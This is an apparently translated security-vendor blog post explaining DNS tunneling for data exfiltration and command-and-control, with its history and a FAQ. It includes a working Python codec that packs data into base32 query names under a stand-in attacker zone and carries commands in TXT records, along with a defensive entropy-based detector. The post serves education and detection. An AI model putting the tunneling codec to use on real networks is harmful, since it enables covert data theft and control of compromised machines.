DNS tunneling turns the Domain Name System into a weapon for attackers. DNS is, in effect, the Internet's giant phone book. It is also the underlying protocol that lets administrators query a DNS server's database. So far, everything seems straightforward. But cunning hackers realized they could communicate covertly with a victim's computer by smuggling control commands and data inside the DNS protocol. That idea is the basis of DNS tunneling.
How DNS tunneling works
Everything on the Internet has its own dedicated protocol, and DNS is a simple request-response protocol. If you want to see it in action, run nslookup, the basic tool for issuing DNS queries. You can ask for an address simply by specifying the name you are interested in, for example:
In this case, the protocol replied with an IP address. In DNS terms, I asked for an address, a so-called "A" type query. There are other query types, and the DNS protocol replies to them with different sets of data fields which, as we will see later, hackers can exploit.
One way or another, at its core the DNS protocol is about sending a request to a server and returning its response to the client. What if an attacker embeds a hidden message inside a domain name request? For example, instead of entering a legitimate URL, he enters the data he wants to transmit:
Suppose the attacker controls the DNS server. He can then transmit data, personal data for instance, without necessarily being detected. After all, why would a DNS query suddenly be treated as something illegitimate?
By controlling the server, hackers can craft the responses and send data back to the target system. This lets them pass hidden messages in various fields of the DNS response to malware on the infected machine, including instructions such as searching specific folders.
The "tunneling" part of this attack is hiding the data and commands from detection by monitoring systems. Hackers can use base32, base64 and other character encodings, or even encrypt the data. Such encoding slips past simple threat detection utilities that only search for plaintext.
And that is DNS tunneling!
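To make the mechanics above concrete, here is an added example in Python (not code from the original post): it packs a payload into the labels of query names under an attacker-controlled zone, reassembles it on the receiving side, builds the RFC 1035 wire-format query that would carry such a name, and encodes a command into TXT record strings for the return direction. The zone name t.example, the chunk size and the sample command are assumptions for illustration. Base32 is used for the names rather than base64 because resolvers may fold case, which would corrupt a case-sensitive encoding; the RFC 1035 limits of 63 octets per label, 253 characters per textual name and 255 octets per TXT string are enforced so that the names are ones a real resolver would forward.

```python
"""Toy DNS tunnel codec (added example): data leaves in query names, commands return in TXT."""
import base64
import random
import struct

MAX_LABEL = 63         # RFC 1035: a label is at most 63 octets
MAX_NAME = 253         # RFC 1035: 255 octets on the wire, 253 characters in text form
MAX_TXT_STRING = 255   # RFC 1035: each <character-string> in TXT RDATA is at most 255 octets
QTYPE_TXT = 16

# Hypothetical attacker-controlled zone (assumption): every name under it reaches the attacker.
TUNNEL_DOMAIN = "t.example"


def b32(data: bytes) -> str:
    """base32 survives case folding by resolvers; padding is dropped and restored on decode."""
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def build_queries(payload: bytes, domain: str = TUNNEL_DOMAIN, chunk: int = 110):
    """Client side: split payload into names of the form <seq>.<label>[.<label>...].<domain>."""
    names = []
    for seq, start in enumerate(range(0, len(payload), chunk)):
        enc = b32(payload[start:start + chunk])
        labels = [enc[i:i + MAX_LABEL] for i in range(0, len(enc), MAX_LABEL)]
        name = ".".join([str(seq), *labels, domain])
        if len(name) > MAX_NAME:
            raise ValueError("chunk too large for one DNS name: %d chars" % len(name))
        names.append(name)
    return names


def reassemble(names, domain: str = TUNNEL_DOMAIN) -> bytes:
    """Server side: accept names in any order, ignore names that are not under our zone."""
    suffix = "." + domain
    chunks = {}
    for name in names:
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        chunks[int(labels[0])] = unb32("".join(labels[1:]))
    return b"".join(chunks[k] for k in sorted(chunks))


def build_query(name: str, qtype: int = QTYPE_TXT, txid: int = 0x1234) -> bytes:
    """Minimal RFC 1035 query packet: 12-byte header (RD=1, QDCOUNT=1) plus one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b""
    for label in name.split("."):
        raw = label.encode("ascii")
        if len(raw) > MAX_LABEL:
            raise ValueError("label longer than 63 octets")
        qname += struct.pack("B", len(raw)) + raw
    return header + qname + b"\x00" + struct.pack("!HH", qtype, 1)  # QCLASS=IN


def parse_question(packet: bytes):
    """Read QNAME and QTYPE back out of a query packet built by build_query."""
    pos, labels = 12, []
    while packet[pos]:
        n = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    qtype = struct.unpack("!H", packet[pos + 1:pos + 3])[0]
    return ".".join(labels), qtype


def encode_txt_command(command: bytes):
    """C2 direction: base64 the command and split it into TXT <character-string>s of <=255 octets."""
    enc = base64.b64encode(command)
    return [enc[i:i + MAX_TXT_STRING] for i in range(0, len(enc), MAX_TXT_STRING)]


def decode_txt_command(strings) -> bytes:
    return base64.b64decode(b"".join(strings))


if __name__ == "__main__":
    secret = bytes(random.getrandbits(8) for _ in range(300))   # constructed "stolen" data
    names = build_queries(secret)
    for n in names:
        print(n)
    assert reassemble(names) == secret
    print(parse_question(build_query(names[0])))
    print(decode_txt_command(encode_txt_command(b"list C:\\Users\\*\\Documents")))  # assumed command
```

Run it and the printed names show why this traffic stands out to anyone who looks: a burst of long, high-entropy labels under a single zone, all requested as TXT records, which is exactly the pattern a monitoring system should key on.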
History of DNS tunneling attacks
Everything has a beginning, including the idea of hijacking the DNS protocol for hacking purposes. As far as we can tell, the first discussion of this attack was by Oskar Pearson on the Bugtraq mailing list in April 1998.
By 2004, DNS tunneling had been presented at Black Hat as a hacking technique in a talk by Dan Kaminsky. So the idea quickly grew into a real attack tool.
Today, DNS tunneling holds a firm place on the map of potential threats (and information security bloggers are often asked to explain it).
Have you heard of Sea Turtle? That is an ongoing campaign by a cybercriminal group, most likely state-sponsored, to hijack legitimate DNS servers and redirect DNS requests to servers of their own. As a result, organizations receive "bad" IP addresses that point to fake pages run by the hackers, impersonating sites such as Google or FedEx. At the same time, the attackers can harvest the user accounts and passwords that victims unwittingly enter on the fake site. This is not DNS tunneling, just another unpleasant consequence of hackers controlling DNS servers.
DNS tunneling threats
DNS tunneling is a kind of indicator that a malicious phase has begun. Which ones? We have already touched on several, but let's lay them out:
Data exfiltration: a hacker covertly sends sensitive data over DNS. This is by no means the most efficient way to move data off a victim's computer, given all the overhead and encoding involved, but it works, and it works quietly!
Command and control (C2 for short): hackers use the DNS protocol to send simple control commands to, say, a remote access trojan (RAT).
IP-over-DNS tunneling: this may sound crazy, but there are utilities that implement the IP stack on top of DNS requests and responses. That makes transferring data with FTP, Netcat, ssh and the like a fairly simple matter. Very ominous!
Q: What is tunneling? A: It is simply a way to transfer data over an existing protocol. The underlying protocol provides a dedicated channel, or tunnel, that is used to hide the information actually being transmitted.
Q: When was the first DNS tunneling attack carried out? A: We don't know! If you do, please let us know. To the best of our knowledge, the first discussion of the attack was started by Oskar Pearson on the Bugtraq mailing list in April 1998.
Q: Which attacks resemble DNS tunneling? A: DNS is far from the only protocol that can be used for tunneling. For example, command and control (C2) malware often uses HTTP to disguise its communication channel. As with DNS tunneling, the hacker hides his data, but in this case it looks like ordinary web browser traffic to a remote site (controlled by the attacker). This can go unnoticed by monitoring tools if they are not configured to treat abuse of the HTTP protocol for hacking purposes as a threat.
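Here is an added example (not Varonis code) of the kind of monitoring configuration the answer above refers to, implemented as a Python heuristic over a constructed DNS query log: it scores each query's subdomain by length and Shannon entropy, then aggregates per client and registered domain so that one odd-looking CDN host name does not raise an alert while a stream of distinct encoded names under a single zone does. The log lines, the thresholds and the "registered domain is the last two labels" rule are all assumptions for illustration; a production detector would use the Public Suffix List and a baseline measured from your own traffic.

```python
"""Flag DNS-tunneling-like traffic in a query log (added example, not Varonis code)."""
import math
from collections import defaultdict

# Thresholds are illustrative assumptions; tune them against your own baseline.
MIN_SUSPICIOUS_LEN = 30   # subdomain characters with dots removed
MIN_ENTROPY = 3.5         # bits per character; ordinary host labels sit well below this
MIN_HITS = 3              # distinct suspicious names per (client, domain) before alerting

# Constructed sample log: "<epoch> <client> <qtype> <qname>", one query per line.
# The t.example lines mimic base32-encoded chunks; the others are benign look-alikes.
SAMPLE_LOG = """\
1700000000 10.0.0.5 A www.example.com
1700000001 10.0.0.5 A mail.example.com
1700000002 10.0.0.5 A a1b2c3d4e5f6.cloudfront.example
1700000003 10.0.0.7 TXT 0.krugkidrovwx653lojswgzlfnfrhi3lsoiqhg4tlmvrxg.t.example
1700000004 10.0.0.7 TXT 1.mfzwizlhnbsxe3lomfyqsbbgmnqyktcjmqzgk3dtpbqsg.t.example
1700000005 10.0.0.7 TXT 2.ozsxg4ltnfxgs3jsonxhezlxmv4hgy3tmvqwwzlhmj2gk.t.example
1700000006 10.0.0.7 TXT 3.n5ygk43lmrqxg5dzojsgc4zxmrsw43lonnrw2zlqom2d.t.example
1700000007 10.0.0.7 TXT 4.pe3wg2lhmvzxizlmnvxgk4dpmrrwkzlxnrsxe3bvmfuws.t.example
1700000008 10.0.0.5 A api.example.com
"""


def shannon_entropy(text: str) -> float:
    """Bits per character; base32/base64 blobs score far higher than real host names."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Return (subdomain, registered_domain).

    Assumes the zone is the last two labels; a real detector would consult the
    Public Suffix List so that names like host.example.co.uk are split correctly.
    """
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def is_suspicious(subdomain: str) -> bool:
    """A single query is suspicious if its subdomain is unusually long or high-entropy."""
    flat = subdomain.replace(".", "")
    return len(flat) >= MIN_SUSPICIOUS_LEN or shannon_entropy(flat) >= MIN_ENTROPY


def analyze(log_text: str) -> dict:
    """Aggregate per (client, registered domain); alert only when distinct suspicious names pile up."""
    hits = defaultdict(set)
    qtypes = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qtype, qname = line.split()
        sub, dom = split_name(qname)
        qtypes[(client, dom)].add(qtype)
        if is_suspicious(sub):
            hits[(client, dom)].add(sub)
    alerts = {}
    for key, subs in hits.items():
        if len(subs) >= MIN_HITS:
            alerts[key] = {
                "distinct_suspicious_names": len(subs),
                "qtypes": sorted(qtypes[key]),
                "mean_len": sum(len(s.replace(".", "")) for s in subs) / len(subs),
            }
    return alerts


if __name__ == "__main__":
    for (client, dom), info in analyze(SAMPLE_LOG).items():
        print("ALERT", client, dom, info)
```

The per-domain aggregation is the important part: the hex-looking cloudfront.example label trips the per-query test on entropy alone, but it is one name, while the t.example client produces five distinct encoded names in eight seconds and all of them ask for TXT records. Counting distinct names also resists an attacker who repeats the same query, and the query-type summary makes an all-TXT (or all-NULL) pattern visible at a glance.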
Want help detecting DNS tunneling? Check out our Varonis Edge module and try a free demo!